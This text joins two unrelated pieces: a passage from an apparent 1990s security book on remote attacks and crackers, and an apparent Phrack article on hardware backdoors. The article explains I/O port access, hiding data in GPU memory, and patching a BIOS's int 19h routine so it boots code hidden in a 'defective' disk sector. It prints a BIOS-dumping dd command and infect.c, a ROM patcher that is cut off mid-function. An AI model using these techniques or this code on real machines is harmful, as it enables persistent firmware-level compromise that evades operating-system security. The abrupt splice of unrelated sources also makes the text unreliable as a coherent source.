This is a major point: There is no way to become either a master system administrator or a master cracker overnight. The hard truth is this: You may spend weeks studying source code, vulnerabilities, a particular operating system, or other information before you truly understand the nature of an attack and what can be culled from it. Those are the breaks. There is no substitute for experience, nor is there a substitute for perseverance or patience. If you lack any of these attributes, forget it.

That is an important point to be made here. Whether we are talking about individuals like Kevin Mitnick (cracker) or people like Wietse Venema (hacker), it makes little difference. Their work and their accomplishments have been discussed in various news magazines and online forums. They are celebrities within the Internet security community (and, in some cases, beyond). However, their accomplishments (good or bad) resulted from hard work, study, ingenuity, thought, imagination, and self-application. Thus, no firewall will save a security administrator who isn’t on top of it, nor will SATAN help a newbie cracker to unlawfully breach the security of a remote target. That’s the bottom line.


Remote attacks are becoming increasingly common. As discussed in several earlier chapters, the ability to run a scan has come within the grasp of the average user. Similarly, the proliferation of searchable vulnerability indexes has greatly enhanced one’s ability to identify possible security issues.

Some individuals suggest that the free sharing of such information is itself contributing to the poor state of security on the Internet. That is incorrect. Rather, system administrators must make use of such publicly available information. They should, technically, perform the procedures described here on their own networks. It is not so much a matter of cost as it is time.

One interesting phenomenon is the increase in tools to attack Windows NT boxes. Not just scanning tools, either, but sniffers, password grabbers, and password crackers. In reference to remote attack tools, though, the best tool available for NT is SAFEsuite by Internet Security Systems (ISS). It contains a wide variety of tools, although the majority were designed for internal security analysis.

For example, consider the Intranet Scanner, which assesses the internal security of a network tied to a Microsoft Windows NT server. Note here that I write only that the network is tied to the NT server. This does not mean that all machines on the network must run NT in order for the Intranet Scanner to work. Rather, it is designed to assess a network that contains nodes of disparate architecture and operating systems. So, you could have boxes running Windows 95, UNIX, or potentially other operating systems running TCP/IP. ISS describes the product line (and a bit about Windows NT security in general) in a white paper titled “Security Assessment in the Windows NT Environment: A White Paper for Network Security Professionals.”


Cross Reference: To get a better idea of what Intranet Scanner offers, check out

Specific ways to target specific operating systems (as in “How To” sections) are beyond the scope of this book, not because I lack the knowledge but because it could take volumes to relate. To give you a frame of reference, consider this: The Australian CERT (AUSCERT) UNIX Security Checklist consists of at least six pages of printed information. The information is extremely abbreviated and is difficult to interpret by anyone who is not well versed in UNIX. Taking each point that AUSCERT raises and expanding it into a detailed description and tutorial would likely create a 400-page book, even if the format contained simple headings such as Daemon, Holes, Source, Impact, Platform, Examples, Fix, and so on. (That document, by the way, discussed elsewhere in this book, is the definitive list of UNIX security vulnerabilities. It is described in detail in Chapter 17, “UNIX: The Big Kahuna.”)

In closing, a well-orchestrated and formidable remote attack is not the work of some half-cocked cracker. It is the work of someone with a deep understanding of the system–someone who is cool, collected, and quite well educated in TCP/IP. (Although that education may not have come in a formal fashion.) For this reason, it is a shame that crackers usually come to such a terrible end. One wonders why these talented folks turn to the dark side.

I know this, though: It has nothing to do with money. There are money-oriented crackers, and they are professionals. But the hobbyist cracker is a social curiosity–so much talent and so little common sense. It is extraordinary, really, for one incredible reason: It was crackers who spawned most of the tools in this book. Their activities gave rise to the more conventional (and more talented) computing communities that are coding special security applications. Therefore, the existence of specialized tools is really a monument to the cracking community. They have had a significant impact, and one such impact was the development of the remote attack. The technique not only exists because of these curious people, but also grows in complexity because of them. 


Hacking deeper in the system

1.  Abstract
     Today, we're observing a growing number of papers focusing on hardware
hacking. Even if hardware-based backdoors are far from being a good
solution to use in the wild, this topic is very important, as some big
corporations are planning to take control of our computers without our
consent using some really badly designed concepts such as DRM and TCPA.
As we can't let them do this at any cost, the time has come for a little
introduction to the hardware world...
     This paper constitutes a tiny introduction to hardware hacking from the
backdoor writer's perspective (hey, this is Phrack, I'm not going to explain
how to pilot your coffee machine with an RS232 interface). The thing is,
even if backdooring hardware isn't such a good idea, it is a good way to
start in hardware hacking. The aim of the author is to give readers the
basics of hardware hacking, which should be useful to prepare for the fight
against TCPA and other crappy things sponsored by big sucke... erm...
"companies" such as Sony and Microsoft.
     This paper is i386-centric. It does not cover any other architecture,
but it can be used as a basis for research on other hardware. Thus,
bear in mind that most of the material presented here won't work on any
machine other than a PC. Subjects such as devices, the BIOS and the internal
workings of a PC will be discussed, and some ideas about turning all these
things to our own advantage will be presented.
     This paper IS NOT an ad nor a presentation of some 3v1L s0fTw4r3,
so you won't find a fully functional backdoor here. The aim of the author
is to provide information that will help you write your own stuff,
not to provide you with already finished work. This subject isn't a
particularly difficult one; all it takes is imagination.
     In order to understand this article, some knowledge of x86 assembly
and architecture is heavily recommended. If you're a newbie to these
subjects, I strongly recommend reading "The Art of Assembly
Programming" (see [1]).
2.  A quick introduction to I/O system
     Before digging straight into the subject, some explanations are in
order. Those of you who already know how I/O works on Intel machines and
what the ports are there for may prefer to skip to the next section.
Others, just keep on reading.
     As this paper focuses on hardware, it would be practical to know how
to access it. The I/O system provides such access. As everybody knows,
the processor (CPU) is the heart, or, more accurately, the brain of the
computer. But the only thing it does is compute. Basically, a CPU isn't
of much help without devices. Devices give the CPU data to be computed,
and allow it to bring back an answer to our requests. The I/O system is
used to link most devices to the CPU. The way processors see I/O-based
devices is much the same as the way they see memory. In fact, all the
processor does to communicate with devices is read and write data
"somewhere in memory" : the I/O system takes care of the next steps.
This "somewhere in memory" is represented by an I/O port. I/O ports are
special "addresses" that connect the CPU data bus to the device. Each
I/O-based device uses at least one I/O port, and many use several.
Basically, the only thing device drivers do is manipulate I/O ports
(well, very basically, that's what they do, just to communicate with
hardware). The Intel architecture provides three main ways to manipulate
I/O ports : memory-mapped I/O, Input/Output-mapped I/O and DMA.
      memory-mapped I/O
   The memory-mapped I/O system allows you to manipulate I/O ports as if
they were plain memory. Instructions such as 'mov' are used to interface
with it. This system is simple : all it does is map I/O ports to memory
addresses so that when data is written/read at one of these addresses, the
data is actually sent to/received by the device connected to the
corresponding port. Thus, the way to communicate with a device is the same
as communicating with memory.
      Input/Output mapped I/O
   The Input/Output-mapped I/O system uses dedicated CPU instructions to
access I/O ports. On i386, these instructions are 'in' and 'out' :
       in  reg, 254  ; reads data from port #254 and stores it in reg
       out 254, reg  ; writes the content of the reg register to port #254
    The only problem with these two instructions is that the port is
8-bit encoded, allowing access only to ports 0 to 255. The sad thing is
that this range of ports is often connected to internal hardware such as
the system clock. The way to circumvent this is the following (taken from
"The Art of Assembly Programming", see [1]) :
To access I/O ports at addresses beyond 255 you must load the 16-bit I/O
address into the DX register and use DX as a pointer to the specified I/O
address. For example, to write a byte to the I/O address $378 you would use
an instruction sequence like the following:
   mov $378, dx
   out al, dx
      DMA
   DMA stands for Direct Memory Access. The DMA system is used to enhance
device-to-memory transfer performance. Back in the old days, most hardware
made use of the CPU to transfer data to and from memory. When computers
started to become "multimedia" (a term as meaningless as "people ready" but
really good looking in "we-are-trying-to-fuck-you-deep-in-the-ass ads"),
that is, when computers started to come equipped with CD-ROMs and sound
cards, the CPU couldn't handle tasks such as playing music while displaying
a shotgun firing at a monster just because the user hit the 'CTRL' key. So,
manufacturers created a new chip to carry out such things, and thus was
born the DMA controller. DMA allows devices to transfer data from and
to memory with few operations done by the CPU. Basically, all the CPU
does is initiate the DMA transfer, and then the DMA chip takes care of
the rest, allowing the CPU to focus on other tasks. The very interesting
thing is that since the CPU doesn't actually do the transfer and since
devices are being used, protected mode does not interfere, which means we
can write and read (almost) anywhere we would like to. This idea is far
from being new, and PHC already evoked it in one of their Phrack parodies.
      DMA is really a powerful system. It allows us to do very cool
tricks, but this comes at the expense of a great price : DMA is a pain in
the ass to use, as it is very hardware specific. Here follow the main
kinds of DMA systems :
      - DMA Controller (third-party DMA) : this DMA system is really old
and inefficient. The idea here is to have a general DMA Controller on the
motherboard that will handle all DMA operations for all devices. This
controller was mainly used with ISA devices and its use is now deprecated
because of performance issues and because only 4 to 8 DMA transfers
(depending on whether the board had two cascading DMA Controllers) could
be set up at the same time (each DMA Controller only provides 4 channels).
      - DMA Bus mastering (first-party DMA) : this DMA system provides
far better performance than the DMA Controller. The idea is to allow each
device to manage DMA itself through a process known as "Bus Mastering".
Instead of relying on the general DMA Controller, each device is able to
take control of the system bus to perform its transfers, allowing hardware
manufacturers to provide an efficient system for their devices.
    These three things are practical enough to get started, but modern
operating systems provide means to access I/O too. As there are a lot of
these systems on the computer market, I'll introduce only the GNU/Linux
system, which constitutes a perfect system for discovering hardware hacking
on Intel. Like many systems, Linux runs in two modes : user land and kernel
land. Since kernel land already allows good control over the system, let's
look at the user-land ways to access I/O. I'll explain here two basic ways
to play with hardware : the in*()/out*() functions and /dev/port.
    The in and out instructions can be used on Linux in user land. Equally,
the functions outb(2), outw(2), outl(2), inb(2), inw(2), inl(2) are
provided to play with I/O and can be called from kernel land or user land.
As stated in "Linux Device Drivers" (see [2]), their use is the following :
    unsigned     inb(unsigned port);
    void   outb(unsigned char byte, unsigned port);
Read or write byte ports (eight bits wide). The port argument is defined as
unsigned long for some platforms and unsigned short for others. The return
type of inb is also different across architectures.
   unsigned      inw(unsigned port);
   void          outw(unsigned short word, unsigned port);
These functions access 16-bit ports (word wide); they are not available
when compiling for the M68k and S390 platforms, which support only byte
I/O.
   unsigned      inl(unsigned port);
   void          outl(unsigned longword, unsigned port);
These functions access 32-bit ports. longword is either declared as
unsigned long or unsigned int, according to the platform. Like word I/O,
"long" I/O is not available on M68k and S390.
    Note that no 64-bit port I/O operations are defined. Even on 64-bit
architectures, the port address space uses a 32-bit (maximum) data path.
    The only restriction on accessing I/O ports this way from user land is
that you must first call the iopl(2) or ioperm(2) function, which is
sometimes protected by security systems like grsec. And of course, you must
be root. Here is a sample code using this way to access I/O :
/*
** Just a simple code to see how to play with inb()/outb() functions.
** usage is :
**    * read : io r <port address>
**    * write : io w <port address> <value>
** compile with : gcc io.c -o io
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/io.h>   /* iopl(2) inb(2) outb(2) */

void       read_io(long port)
{
  unsigned int   val;

  val = inb(port);
  fprintf(stdout, "value : %X\n", val);
}

void       write_io(long port, long value)
{
  outb(value, port);
}

int   main(int argc, char **argv)
{
  long     port;

  if (argc < 3)
    {
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
      exit(EXIT_FAILURE);
    }
  port = atoi(argv[2]);
  if (iopl(3) == -1)
    {
      fprintf(stderr, "could not get permissions to I/O system\n");
      exit(EXIT_FAILURE);
    }
  if (!strcmp(argv[1], "r"))
    read_io(port);
  else if (!strcmp(argv[1], "w") && argc > 3)
    write_io(port, atoi(argv[3]));
  else
    fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  return 0;
}
    /dev/port is a special file that allows you to access I/O as if you
were manipulating a simple file. The use of the functions open(2), read(2),
write(2), lseek(2) and close(2) allows manipulation of /dev/port. Just go
to the address corresponding to the port with lseek() and read() or write()
to the hardware. Here is a sample code to do it :
/*
** Just a simple code to see how to play with /dev/port
** usage is :
**    * read : port r <port address>
**    * write : port w <port address> <value>
** compile with : gcc port.c -o port
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>   /* lseek(2) read(2) write(2) close(2) */

void       read_port(int fd, long port)
{
  unsigned int   val = 0;

  lseek(fd, port, SEEK_SET);
  read(fd, &val, sizeof(char));
  fprintf(stdout, "value : %X\n", val);
}

void       write_port(int fd, long port, long value)
{
  lseek(fd, port, SEEK_SET);
  write(fd, &value, sizeof(char));
}

int   main(int argc, char **argv)
{
  int      fd;
  long     port;

  if (argc < 3)
    {
      fprintf(stderr, "usage is : port <r|w> <port> [value]\n");
      exit(EXIT_FAILURE);
    }
  port = atoi(argv[2]);
  if ((fd = open("/dev/port", O_RDWR)) == -1)
    {
      fprintf(stderr, "could not open /dev/port\n");
      exit(EXIT_FAILURE);
    }
  if (!strcmp(argv[1], "r"))
    read_port(fd, port);
  else if (!strcmp(argv[1], "w") && argc > 3)
    write_port(fd, port, atoi(argv[3]));
  else
    fprintf(stderr, "usage is : port <r|w> <port> [value]\n");
  close(fd);
  return 0;
}
    Ok, one last thing before closing this introduction : for Linux users
who want to list the I/O Ports on their system, just do a
"cat /proc/ioports", ie:
     $ cat /proc/ioports # lists ports from 0000 to FFFF
     0000-001f : dma1
     0020-0021 : pic1
     0040-0043 : timer0
     0050-0053 : timer1
     0060-006f : keyboard
     0080-008f : dma page reg
     00a0-00a1 : pic2
     00c0-00df : dma2
     00f0-00ff : fpu
     0170-0177 : ide1
     01f0-01f7 : ide0
     0213-0213 : ISAPnP
     02f8-02ff : serial
     0376-0376 : ide1
     0378-037a : parport0
     0388-0389 : OPL2/3 (left)
     038a-038b : OPL2/3 (right)
     03c0-03df : vga+
     03f6-03f6 : ide0
     03f8-03ff : serial
     0534-0537 : CS4231
     0a79-0a79 : isapnp write
     0cf8-0cff : PCI conf1
     b800-b8ff : 0000:00:0d.0
       b800-b8ff : 8139too
     d000-d0ff : 0000:00:09.0
       d000-d0ff : 8139too
     d400-d41f : 0000:00:04.2
       d400-d41f : uhci_hcd
     d800-d80f : 0000:00:04.1
       d800-d807 : ide0
       d808-d80f : ide1
     e400-e43f : 0000:00:04.3
       e400-e43f : motherboard
       e400-e403 : PM1a_EVT_BLK
       e404-e405 : PM1a_CNT_BLK
       e408-e40b : PM_TMR
       e40c-e40f : GPE0_BLK
       e410-e415 : ACPI CPU throttle
     e800-e81f : 0000:00:04.3
       e800-e80f : motherboard
         e800-e80f : pnp 00:02
3.  Playing with GPU
     3D cards are just GREAT, period. When you're installing such a card in
your computer, you're not just plugging in a device that can render nice
graphics, you're also putting a mini-computer inside your own computer.
Today's graphics cards aren't a simple chip anymore. They have memory, they
have a processor, they even have a BIOS ! You can enjoy a LOT of features
from these little things.
     First of all, let's consider what a 3D card really is. 3D cards are
here to speed up your computer's 3D rendering and to send output to your
screen for display. As I said, there are three parts that interest
us in our 3v1L doings :
       1/ The Video RAM. It is memory embedded on the card. This memory is
used to store the scene to be rendered and to store computed results. Most
of today's cards come with more than 256 MB of memory, which provides us
with a nice place to store our stuff.
       2/ The Graphical Processing Unit (GPU for short). It constitutes the
processor of your 3D card. Most 3D operations are math, so most GPU
instructions perform math geared toward graphics.
       3/ The BIOS. A lot of devices today include their own BIOS. 3D cards
are no exception, and their little BIOS can be very interesting, as it
contains the firmware of your 3D card, and when you can access a firmware,
well, you can do nearly anything you dream of.
       I'll give ideas about what we can do with these three elements, but
first we need to know how to play with the card. Sadly, as with any
device in your computer, you need the specs of your hardware, and most 3D
cards are not open enough to do whatever we want. But this is not a big
problem in itself, as we can use a simple API which will talk to the card
for us. Of course, this prevents us from using tricks on the card in
certain conditions, like in a shellcode, but once you've gained root and
can do as you please on the system, it isn't an issue anymore. The API I'm
talking about is OpenGL (see [3]), and if you're not already familiar with
it, I suggest you read the tutorials at [4]. OpenGL is a 3D programming
API defined by the OpenGL Architecture Review Board, which is composed of
members from many of the industry's leading graphics vendors. This library
often comes with your drivers, and by using it, you can easily develop
portable code that will use the features of whatever 3D card is present.
       As we now know how to communicate with the card, let's take a deeper
look at this piece of hardware. GPUs are used to transform a 3D environment
(the "scene") given by the programmer into a 2D image (your screen).
Basically, a GPU is a computing pipeline applying various mathematical
operations on data. I won't introduce here the complete process of
transforming a 3D scene into a 2D display, as it is not the point of this
paper. In our case, all you have to know is :
   1/ The GPU is used to transform input (usually a 3D scene, but nothing
prevents us from feeding it anything else)
   2/ These transformations are done using mathematical operations commonly
used in graphical programming (and again, nothing prevents us from using
those operations for another purpose)
   3/ The pipeline is composed of two main computations, each involving
multiple steps of data transformation :
       - Transformation and Lighting : this step translates 3D objects
       into 2D nets of polygons (usually triangles), generating a
       wireframe rendering.
       - Rasterization : this step takes the wireframe rendering as input
       data and computes pixel values to be displayed on the screen.
      So now, let's take a look at what we can do with all these
features. What interests us here is hiding data where it would be hard to
find and executing instructions outside the computer's main processor. I
won't talk about patching 3D card firmware, as it requires heavy reverse
engineering and is very specific to each card, which is not the subject
of this paper.
      First, let's consider instruction execution. Of course, as we are
playing with a 3D card, we can't do everything we can do with a computer
processor, like triggering software interrupts, issuing I/O operations or
manipulating memory, but we can do lots of mathematical operations. For
example, we can encrypt and decrypt data with the 3D card's processor,
which can make the reverse engineering task quite painful. It can also
speed up programs relying on heavy mathematical operations by letting the
computer's processor do other things while the 3D card computes for it.
Such things have already been widely done. In fact, some people are
already having fun using GPUs for various purposes (see [5]). The idea
here is to use the GPU to transform data we feed it. GPUs provide a
system to program them called "shaders". You can think of shaders as
programmable hooks within the GPU which allow you to add your own
routines to the data transformation process. These hooks can be triggered
at two places in the computing pipeline, depending on the shader you're
using. Traditionally, shaders are used by programmers to add special
effects to the rendering process, and as the rendering process is
composed of two steps, the GPU provides two programmable shaders. The
first shader is called the "Vertex shader" and is used during the
transformation and lighting step. The second shader is called the "Pixel
shader" and is used during the rasterization process.
        Ok, so now we have two entry points into the GPU system, but this
doesn't tell us how to develop and inject our own routines. Again, as we
are playing in the hardware world, there are several ways to do it,
depending on the hardware and the system you're running on. Shaders use
their own programming languages; some are low-level assembly-like
languages, others are high-level C-like languages. The three main
languages used today are high-level ones :
      - High-Level Shader Language (HLSL) : this language is provided by
      Microsoft's DirectX API, so you need MS Windows to use it. (see [6])
      - OpenGL Shading Language (GLSL or GLSlang) : this language is
      provided by the OpenGL API. (see [7])
      - Cg : this language was introduced by NVIDIA to program on their
      hardware using either the DirectX API or the OpenGL one. Cg comes
      with a full toolkit distributed by NVIDIA for free (see [8] and [9]).
    Now that we know how to program GPUs, let's consider the most
interesting part : data hiding. As I said, 3D cards come with a nice
amount of memory. Of course, this memory is intended for graphical usage,
but nothing prevents us from storing some stuff in it. In fact, with the
help of shaders we can even ask the 3D card to store and encrypt our
data. This is fairly easy to do : we feed the data into the beginning of
the pipeline, we program the shaders to decide how to store and encrypt
it, and we're done. Retrieving the data is nearly the same operation : we
ask the shaders to decrypt it and send it back to us. Note that this
encryption is really weak, as we rely only on the shaders' computation
and as the encryption and decryption process can be reversed by simply
looking at the shader programming in your code, but it can constitute an
effective way to improve already existing tricks (a 3D card based Shiva
could be fun).
    Ok, so now we can start coding stuff taking advantage of our 3D cards.
But wait ! We don't want to mess with shaders, we don't want to learn
about 3D programming, we just want to execute code on the device so we
can quickly test what we can do with it. Learning shader programming is
important because it allows you to understand the device better, but it
can take a long time for people unfamiliar with the 3D world. Recently,
nVIDIA released an SDK allowing programmers to easily use 3D devices for
purposes other than graphics. nVIDIA CUDA (see [10]) is an SDK that lets
programmers use the C language with new keywords telling the compiler
which parts of the code should be executed on the device and which parts
should be executed on the CPU. CUDA also comes with various mathematical
libraries.
     Here is a fun piece of code illustrating the use of CUDA :
------[ 3ddb.c

/*
** 3ddb.c : a very simple program used to store an array in
** GPU memory and make the GPU "encrypt" it. Compile it using nvcc.
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <cutil.h>
#include <cuda.h>

/*** GPU code and data ***/

char *           store;

__global__ void  encrypt(int key)
{
  /* do any encryption you want here */
  /* and put the result into 'store' */
  /* (you need to modify CPU code if */
  /* the encrypted text size is      */
  /* different than the clear text   */
  /* one). */
}

/*** end of GPU code and data ***/

/*** CPU code and data ***/

CUdevice   dev;

void       usage(char * cmd)
{
  fprintf(stderr, "usage is : %s <string> <key>\n", cmd);
  exit(1);
}

void       init_gpu()
{
  int      count;

  CUT_DEVICE_INIT();
  CU_SAFE_CALL(cuDeviceGetCount(&count));
  if (count <= 0)
    {
      fprintf(stderr, "error : could not connect to any 3D card\n");
      exit(1);
    }
  CU_SAFE_CALL(cuDeviceGet(&dev, 0));
}

int        main(int argc, char ** argv)
{
  int      i;
  int      key;
  char *   res;

  if (argc != 3)
    usage(argv[0]);
  init_gpu();
  CUDA_SAFE_CALL(cudaMalloc((void **)&store, strlen(argv[1])));
  CUDA_SAFE_CALL(cudaMemcpy(store, argv[1], strlen(argv[1]),
                            cudaMemcpyHostToDevice));
  res = malloc(strlen(argv[1]));
  key = atoi(argv[2]);
  encrypt<<<128, 256>>>(key);
  CUDA_SAFE_CALL(cudaMemcpy(res, store, strlen(argv[1]),
                            cudaMemcpyDeviceToHost));
  for (i = 0; i < strlen(argv[1]); i++)
    printf("%c", res[i]);
  printf("\n");
  CUT_EXIT(argc, argv);
  return 0;
}
4.  Playing with BIOS
     BIOSes are very interesting. A little work has already been done in
this area and some stuff has been published. But let's recap all of it
and take a look at what wonderful tricks we can do with this little chip.
First of all, BIOS means Basic Input/Output System. This chip is in
charge of handling the boot process and low-level configuration, and of
providing a set of functions for boot loaders and operating systems
during their early loading process. In fact, at boot time, the BIOS takes
control of the system first, then it does a couple of checks, then it
sets up an IDT to provide features via interrupts, and finally tries to
load the boot loader located on each bootable device, following its
configuration. For example, if you specify in your BIOS setup to first
try to boot from the optical drive and then from your hard drive, at boot
time the BIOS will first try to run an OS from the CD, then from your
hard drive. The BIOS's code is the VERY FIRST code to be executed on your
system. The interesting thing is that backdooring it virtually gives us
deep control of the system and a practical way to bypass nearly any
security system running on the target, since we execute code even before
that system starts ! But this has one big drawback : as we are playing
with hardware, portability becomes a really big issue.
     The first thing you need to know about playing with BIOS is that there
are several ways to do it. Some really good publications (see [11]) have
been made on the subject, but I'll focus on what we can do when patching
the ROM containing the BIOS.
      BIOSes are stored in a chip located on your motherboard. Old
BIOSes were single ROMs without write possibilities, but then some
manufacturers got the brilliant idea of allowing BIOS patching. They
introduced the BIOS
flasher, which is a little device we can communicate with using the I/O
system. The flasher can read and write the BIOS for us, which is all we
need to play in this land. Of course, as there are many different BIOSes
in the wild, I won't introduce any particular chip. Here are some pointers
that will help you :
      * [12] /dev/bios is a tool from the OpenBIOS initiative (see [13]).
It is a kernel module for Linux that creates devices to easily manipulate
various BIOSes. It can access several BIOSes, including network card
BIOSes. It is a nice tool to play with and the code is nice, so you'll
see how to get your hands dirty.
      * [14] is a WONDERFUL guide that explains nearly everything about
Award BIOSes. This paper is a must-read for anyone interested in this
subject, even if you don't own an Award BIOS.
      * [15] is an interesting website to find information about various
BIOSes.
      In order to start easy and fast, we'll use a virtual machine, which
is very handy to test your concepts before you waste your BIOS. I
recommend Bochs (see [16]) as it is free and open source, and mainly
because it comes with very well commented source code used to emulate a
BIOS. But first, let's see how BIOSes really work.
       As I said, the BIOS is the first entity to have control over your
system at boot time. The interesting thing is that, in order to start
reverse engineering your BIOS, you don't even need to use the flasher. At
the start of the boot process, the BIOS's code is mapped (or "shadowed")
into RAM at a specific location and uses a specific range of memory. All
we have to do to read this code, which is 16-bit assembly, is to read
memory. The BIOS memory area starts at 0xf0000 and ends at 0x100000
(983040 = 0xf0000, 65536 = 64 KB). An easy way to dump the code is to
simply do a :
   % dd if=/dev/mem of=BIOS.dump bs=1 count=65536 skip=983040
   % objdump -b binary -m i8086 -D BIOS.dump
   You should note that as the BIOS contains data as well as code, such a
blind disassembly isn't accurate : you will have shifts preventing the
code from being disassembled correctly. To address this problem, use the
entry point table provided further on together with objdump's
'--start-address' option.
      Of course, the code you see in memory is rarely easy to find as-is
in the chip itself, but having this somewhat "unencrypted text" can help
a lot. To get started on what is interesting in this code, let's have a
look at a very interesting comment in the Bochs BIOS source code
(from [17]) :
       30 // ROM BIOS compatability entry points:
       31 // ===================================
       32 // $e05b ; POST Entry Point
       33 // $e2c3 ; NMI Handler Entry Point
       34 // $e3fe ; INT 13h Fixed Disk Services Entry Point
       35 // $e401 ; Fixed Disk Parameter Table
       36 // $e6f2 ; INT 19h Boot Load Service Entry Point
       37 // $e6f5 ; Configuration Data Table
       38 // $e729 ; Baud Rate Generator Table
       39 // $e739 ; INT 14h Serial Communications Service Entry Point
       40 // $e82e ; INT 16h Keyboard Service Entry Point
       41 // $e987 ; INT 09h Keyboard Service Entry Point
       42 // $ec59 ; INT 13h Diskette Service Entry Point
       43 // $ef57 ; INT 0Eh Diskette Hardware ISR Entry Point
       44 // $efc7 ; Diskette Controller Parameter Table
       45 // $efd2 ; INT 17h Printer Service Entry Point
       46 // $f045 ; INT 10 Functions 0-Fh Entry Point
       47 // $f065 ; INT 10h Video Support Service Entry Point
       48 // $f0a4 ; MDA/CGA Video Parameter Table (INT 1Dh)
       49 // $f841 ; INT 12h Memory Size Service Entry Point
       50 // $f84d ; INT 11h Equipment List Service Entry Point
       51 // $f859 ; INT 15h System Services Entry Point
       52 // $fa6e ; Character Font for 320x200 & 640x200 Graphics \
       (lower 128 characters)
       53 // $fe6e ; INT 1Ah Time-of-day Service Entry Point
       54 // $fea5 ; INT 08h System Timer ISR Entry Point
       55 // $fef3 ; Initial Interrupt Vector Offsets Loaded by POST
       56 // $ff53 ; IRET Instruction for Dummy Interrupt Handler
       57 // $ff54 ; INT 05h Print Screen Service Entry Point
       58 // $fff0 ; Power-up Entry Point
       59 // $fff5 ; ASCII Date ROM was built - 8 characters in MM/DD/YY
       60 // $fffe ; System Model ID
       These offsets indicate where to find specific BIOS
functionalities in memory and, as they are standard, you can apply them
to your BIOS too. For example, BIOS interrupt 19h is located in memory at
0xfe6f2 and its job is to load the boot loader into RAM and jump to it.
On old systems, a little trick was to jump to this memory location to
reboot the system. But before considering BIOS code modification, we have
one issue to resolve : BIOS chips have limited space, and while they
provide enough room for basic backdoors, we'll quickly end up begging for
more places to store code if we want to do something nice. We have two
ways to get more space :
     1/ We patch the int 19h code so that instead of loading the real
boot loader from the specified device, it loads our code (which will load
the real boot loader once it's done) from a specific location, like a
sector marked as defective on a specific hard drive. Of course, this
operation implies altering a medium other than the BIOS, but since it
provides us with nearly as much space as we could dream of, this method
must be taken into consideration.
     2/ If you absolutely want to stay in BIOS space, you can use a
little trick available on some BIOS models. One day, processor
manufacturers made a deal with BIOS manufacturers : processor
manufacturers decided to make the CPU's microcode updatable in order to
fix bugs without having to recall all the hardware they had sold
(remember the f00f bug ?). The idea was that the BIOS would store the
updated microcode and inject it into the CPU during each boot process, as
modifications to microcode aren't permanent. This feature is known as
"BIOS update". Of course, this microcode takes space, so we can search
for the code injecting it, hook it so it doesn't do anything anymore, and
erase the microcode to store our own code in its place.
        Implementing 2/ is more complex than 1/, so we'll focus on the
first one to get started. The idea is to make the BIOS load our own code
before the boot loader. This is very easy to do. Again, the BochsBIOS
sources will come in handy, and if you look at your BIOS dump, you should
see very few differences. The code which interests us is located at
0xfe6f2 and is the 19h BIOS interrupt, the one in charge of loading the
boot loader. Let's take a look at the interesting part of its code :
       7238   // We have to boot from harddisk or floppy
       7239   if (bootcd == 0) {
       7240     bootseg=0x07c0;
       7242 ASM_START
       7243     push bp     
       7244     mov  bp, sp
       7246     mov  ax, #0x0000
       7247     mov  _int19_function.status + 2[bp], ax 
       7248     mov  dl, _int19_function.bootdrv + 2[bp]
       7249     mov  ax, _int19_function.bootseg + 2[bp]
       7250     mov  es, ax         ;; segment          
       7251     mov  bx, #0x0000    ;; offset           
       7252     mov  ah, #0x02      ;; function 2, read diskette sector
       7253     mov  al, #0x01      ;; read 1 sector    
       7254     mov  ch, #0x00      ;; track 0          
       7255     mov  cl, #0x01      ;; sector 1         
       7256     mov  dh, #0x00      ;; head 0
       7257     int  #0x13          ;; read sector
       7258     jnc  int19_load_done
       7259     mov  ax, #0x0001
       7260     mov  _int19_function.status + 2[bp], ax
       7262 int19_load_done:
       7263     pop  bp
       7264 ASM_END
      int 13h is the BIOS interrupt used to access storage devices. In
our case, the BIOS is trying to load the boot loader, which is on the
first sector of the drive. The interesting thing is that by changing the
value put in a single register, we can make the BIOS load our own code.
For instance, if we hide our code in sector number 0xN and patch the BIOS
so that instead of the instruction 'mov cl, #0x01' we have
'mov cl, #0xN', we can have our code loaded at each boot and reboot.
Basically, we can store our code wherever we want, as we can change the
sector, the track and even the drive to be used. It is up to you to
choose where to store your code, but as I said, a sector marked as
defective can work out as an interesting trick.
       Here are three source files to help you get started faster : the
first one, infect.c, modifies the BIOS ROM so that it loads our code
before the boot loader; infect.c needs /dev/bios to run. The second one,
evil.asm, is a skeleton to fill with your own code and is loaded by the
BIOS. The third one, store.c, injects the assembled evil.asm into the
target sector of the first track of the hard drive.
--[ infect.c

/*
** infect.c : patches a BIOS ROM image so that int 19h loads our own
** code instead of the real boot loader. Needs /dev/bios (see [12]).
*/

#define _GNU_SOURCE

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define BUFSIZE       512

#define BIOS_DEV "/dev/bios"

#define CODE          "\xbb\x00\x00"  /* mov bx, 0 */ \
                 "\xb4\x02"      /* mov ah, 2 */ \
                 "\xb0\x01"      /* mov al, 1 */ \
                 "\xb5\x00"      /* mov ch, 0 */ \
                 "\xb6\x00"      /* mov dh, 0 */ \
                 "\xb1\x01"      /* mov cl, 1 */ \
                 "\xcd\x13"      /* int 0x13 */

#define TO_PATCH      "\xb1\x01"   /* mov cl, 1 */
#define SECTOR_OFFSET 1            /* offset of the sector number */

void  usage(char *cmd)
{
  fprintf(stderr, "usage is : %s [bios rom] <sector> <infected rom>\n", cmd);
  exit(1);
}

/*
** This function looks in the BIOS rom and searches for the int 19h
** procedure. The algorithm used sucks, as it does only a naive search.
** Interested readers should change it.
*/
char *     search(char * buf, size_t size)
{
  return memmem(buf, size, CODE, sizeof(CODE) - 1);
}

void  patch(char * tgt, size_t size, int sector)
{
  char     new;
  char *   tmp;

  tmp = memmem(tgt, size, TO_PATCH, sizeof(TO_PATCH) - 1);
  new = (char)sector;
  if (tmp != NULL)
    tmp[SECTOR_OFFSET] = new;
}

int        main(int argc, char **argv)
{
  int      sector;
  size_t   i;
  ssize_t  ret;
  size_t   cnt;
  int      devfd;
  int      outfd;
  char *   buf;
  char *   dev;
  char *   out;
  char *   tgt;
  char     tmp[BUFSIZE];

  if (argc == 3)
    {
      dev = BIOS_DEV;
      out = argv[2];
      sector = atoi(argv[1]);
    }
  else if (argc == 4)
    {
      dev = argv[1];
      out = argv[3];
      sector = atoi(argv[2]);
    }
  else
    usage(argv[0]);
